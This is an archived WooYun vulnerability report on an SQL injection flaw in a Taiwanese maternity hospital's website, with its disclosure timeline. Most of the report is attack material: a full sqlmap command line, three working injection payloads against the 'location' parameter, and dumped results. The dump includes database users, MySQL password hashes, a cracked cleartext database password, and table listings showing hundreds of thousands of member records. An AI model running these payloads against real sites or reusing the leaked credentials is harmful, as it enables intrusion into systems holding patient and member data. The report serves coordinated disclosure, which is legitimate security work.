当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154899

漏洞标题:宏其婦幼醫院主站存在SQL注射漏洞(DBA权限+root密码泄漏+数百万网站日志泄漏+用户密码泄漏)(臺灣地區)

相关厂商:宏其婦幼醫院

漏洞作者: 路人甲

提交时间:2015-11-26 12:53

修复时间:2016-01-14 06:08

公开时间:2016-01-14 06:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

宗旨:以領先的技術品質,維護婦幼身心健康的健康
目標:建立一個以病人為中心的醫療理想國。
願景:成為社區民眾最信賴的婦幼醫院。
策略:以獨特領先的定位,提供高品質、高價值的服務。
核心價值:技術、品質、愛心。
精神標語:專業、領先、愛心、微笑。

详细说明:

地址:http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476

python sqlmap.py -u "http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476" -p location --technique=BEU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: women
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| album_log                             | 1002811 |
| log_weblog                            | 412181  |
| blog_log                              | 306390  |
| member                                | 250420  |
| log_forum                             | 235665  |

漏洞证明:

---
Parameter: location (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: doit=searchViewNo&location=1') AND 2822=2822 AND ('vjhM'='vjhM&no=476
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: doit=searchViewNo&location=1') AND (SELECT 2561 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(2561=2561,1))),0x7176707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('dYQs'='dYQs&no=476
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: doit=searchViewNo&location=-5225') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707871,0x6d4a6d544b57504643494c5964466e6952566b44434966704b734955784c43445666594a48417671,0x7176707071),NULL,NULL,NULL,NULL-- -&no=476
---
web server operating system: Linux Fedora 3 (Heidelberg)
web application technology: Apache 2.0.52, JSP
back-end DBMS: MySQL 5.0
current user:    'women@localhost'
current user is DBA:    True
database management system users [7]:
[*] ''@'localhost'
[*] ''@'womencare'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'women'@'**.**.**.**'
[*] 'women'@'localhost'
database management system users password hashes:
[*] root [2]:
    password hash: *7CC095E596F1266843CA33626F407BC53ECA9FF7
    password hash: NULL
[*] women [1]:
    password hash: *5936679E229C6BDD07F1739FB21DB9D30F46855F
    clear-text password: qpwoei
Database: women_bak_catgory
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| member                                | 184277  |
| medication_directory                  | 256     |
| category                              | 157     |
| `catalog`                             | 154     |
| magazine_detail                       | 136     |
| health_article                        | 112     |
| article                               | 93      |
| questionary_policlinic                | 93      |
| forum                                 | 80      |
| services                              | 63      |
| blog_photo                            | 41      |
| care_mother                           | 35      |
| art                                   | 19      |
| magazine                              | 16      |
| ad                                    | 15      |
| factory                               | 15      |
| system_config                         | 15      |
| blog_category                         | 14      |
| ask                                   | 13      |
| links                                 | 12      |
| organization_info                     | 12      |
| blog_weblog                           | 10      |
| questionary_classroom                 | 8       |
| questionary_inpatient                 | 8       |
| blog                                  | 7       |
| women_info                            | 7       |
| blog_album                            | 5       |
| blog_guestbook                        | 5       |
| admin                                 | 4       |
| blog_friend                           | 3       |
| blog_fetus                            | 1       |
+---------------------------------------+---------+
Database: women_test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| album_log                             | 208460  |
| member                                | 178861  |
| checkpaper                            | 29031   |
| photo                                 | 11770   |
| album                                 | 10872   |
| ask                                   | 8435    |
| guestbook                             | 1449    |
| ecard                                 | 1156    |
| medication_directory                  | 251     |
| member_bonus                          | 130     |
| category                              | 117     |
| magazine_detail                       | 106     |
| health_article                        | 90      |
| services                              | 44      |
| checkitem                             | 38      |
| news                                  | 31      |
| magazine                              | 14      |
| doctor                                | 13      |
| organization_info                     | 12      |
| enews_paper                           | 11      |
| art                                   | 10      |
| system_config                         | 9       |
| questionary_policlinic                | 8       |
| contact_us                            | 7       |
| women_info                            | 7       |
| albumguestbook                        | 6       |
| dr_say                                | 6       |
| links                                 | 6       |
| classroom_singup                      | 5       |
| ad                                    | 4       |
| classroom                             | 3       |
| admin                                 | 2       |
| dr_mail                               | 1       |
| questionary_classroom                 | 1       |
| questionary_inpatient                 | 1       |
+---------------------------------------+---------+
Database: women_bak971018
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| album_log                             | 220548  |
| member                                | 183779  |
| checkpaper                            | 29340   |
| photo                                 | 12451   |
| album                                 | 11490   |
| ask                                   | 8949    |
| member_bonus                          | 3464    |
| albumguestbook                        | 2075    |
| guestbook_album                       | 2000    |
| ecard                                 | 1213    |
| member_update_log                     | 350     |
| classroom_singup                      | 308     |
| medication_directory                  | 256     |
| magazine_detail                       | 136     |
| news                                  | 120     |
| category                              | 117     |
| health_article                        | 110     |
| contact_us                            | 93      |
| questionary_policlinic                | 92      |
| enews_paper                           | 83      |
| services                              | 63      |
| guestbook                             | 42      |
| checkitem                             | 37      |
| dr_mail                               | 33      |
| art                                   | 19      |
| classroom                             | 16      |
| magazine                              | 15      |
| doctor                                | 13      |
| links                                 | 12      |
| organization_info                     | 12      |
| album_count                           | 10      |
| system_config                         | 9       |
| questionary_classroom                 | 8       |
| questionary_inpatient                 | 8       |
| women_info                            | 7       |
| dr_say                                | 6       |
| ad                                    | 4       |
| admin                                 | 4       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 825     |
| help_topic                            | 475     |
| help_keyword                          | 401     |
| help_category                         | 36      |
| `user`                                | 7       |
| db                                    | 6       |
+---------------------------------------+---------+
Database: old_women2
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| album_log                             | 207545  |
| member                                | 182289  |
| checkpaper                            | 29012   |
| photo                                 | 11732   |
| album                                 | 10835   |
| ask                                   | 8436    |
| guestbook_album                       | 2000    |
| note                                  | 1455    |
| ecard                                 | 1156    |
| orders_detail                         | 783     |
| orders_master                         | 590     |
| article                               | 278     |
| instruction                           | 139     |
| category                              | 94      |
| showpage                              | 55      |
| albumforum                            | 46      |
| `catalog`                             | 44      |
| magazine                              | 39      |
| act_result                            | 38      |
| checkitem                             | 38      |
| act                                   | 32      |
| doctor                                | 15      |
| freight                               | 15      |
| factory                               | 10      |
| admin                                 | 4       |
| classroom                             | 4       |
| marquee                               | 3       |
| news                                  | 3       |
| illustration                          | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 3189    |
| STATISTICS                            | 424     |
| KEY_COLUMN_USAGE                      | 291     |
| TABLE_CONSTRAINTS                     | 265     |
| TABLES                                | 263     |
| USER_PRIVILEGES                       | 127     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| SCHEMA_PRIVILEGES                     | 92      |
| CHARACTER_SETS                        | 36      |
| SCHEMATA                              | 8       |
+---------------------------------------+---------+
Database: women
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| album_log                             | 1002811 |
| log_weblog                            | 412181  |
| blog_log                              | 306390  |
| member                                | 250420  |
| log_forum                             | 235665  |
| epaper_log                            | 70301   |
| checkpaper                            | 40902   |
| member_bonus                          | 40238   |
| photo                                 | 29796   |
| album                                 | 28430   |
| ask                                   | 15933   |
| albumguestbook                        | 5281    |
| blog_photo                            | 4786    |
| classroom_singup                      | 3929    |
| news                                  | 3353    |
| blog_category                         | 3269    |
| blog_weblog                           | 3177    |
| guestbook_album                       | 2000    |
| webphoto                              | 1899    |
| ecard                                 | 1847    |
| contact_us                            | 1845    |
| blog_guestbook                        | 1445    |
| member_update_log                     | 1089    |
| enews_paper                           | 1080    |
| forum                                 | 691     |
| blog_friend                           | 653     |
| `catalog`                             | 639     |
| questionary_policlinic                | 535     |
| magazine_detail                       | 487     |
| dr_mail                               | 461     |
| blog                                  | 440     |
| article                               | 430     |
| orders_detail                         | 316     |
| medication_directory                  | 306     |
| blog_album                            | 299     |
| health_article                        | 274     |
| orders_master                         | 211     |
| classroom                             | 188     |
| services                              | 157     |
| category                              | 146     |
| guestbook                             | 134     |
| album_count                           | 91      |
| epaper                                | 61      |
| checkitem                             | 40      |
| care_mother                           | 35      |
| questionary_inpatient                 | 34      |
| webalbum                              | 34      |
| doctor                                | 31      |
| organization_info                     | 30      |
| magazine                              | 28      |
| ad                                    | 22      |
| dr_say                                | 22      |
| factory                               | 21      |
| questionary_classroom                 | 20      |
| art                                   | 19      |
| system_config                         | 17      |
| links                                 | 12      |
| women_info                            | 7       |
| time_table                            | 5       |
| admin                                 | 4       |
| blog_fetus                            | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: women_bak_catgory
Table: account
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(10) |
+--------+-------------+
Database: women_bak971018
Table: account
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(10) |
+--------+-------------+
Database: women
Table: account
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(10) |
+--------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: women_test
Table: account
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| passwd | varchar(10) |
+--------+-------------+
Database: women_bak_catgory
Table: account
[0 entries]
+--------+
| passwd |
+--------+
+--------+
Database: women_test
Table: account
[0 entries]
+--------+
| passwd |
+--------+
+--------+
Database: women_bak971018
Table: account
[0 entries]
+--------+
| passwd |
+--------+
+--------+
Database: women
Table: account
[0 entries]
+--------+
| passwd |
+--------+
+--------+
Database: mysql
Table: user
[4 entries]
+----------------------------------------------------+
| Password                                           |
+----------------------------------------------------+
| *5936679E229C6BDD07F1739FB21DB9D30F46855F (qpwoei) |
| *5936679E229C6BDD07F1739FB21DB9D30F46855F (qpwoei) |
| *7CC095E596F1266843CA33626F407BC53ECA9FF7          |
| *7CC095E596F1266843CA33626F407BC53ECA9FF7          |
+----------------------------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-30 06:07

厂商回复:

感謝通報

最新状态:

2016-01-12:HITCON 於接獲通報後除 email 該網站所示之服務信箱外,亦曾致電該醫院資訊人員告知此漏洞,但對方至今仍無回應。

漏洞评价:

评价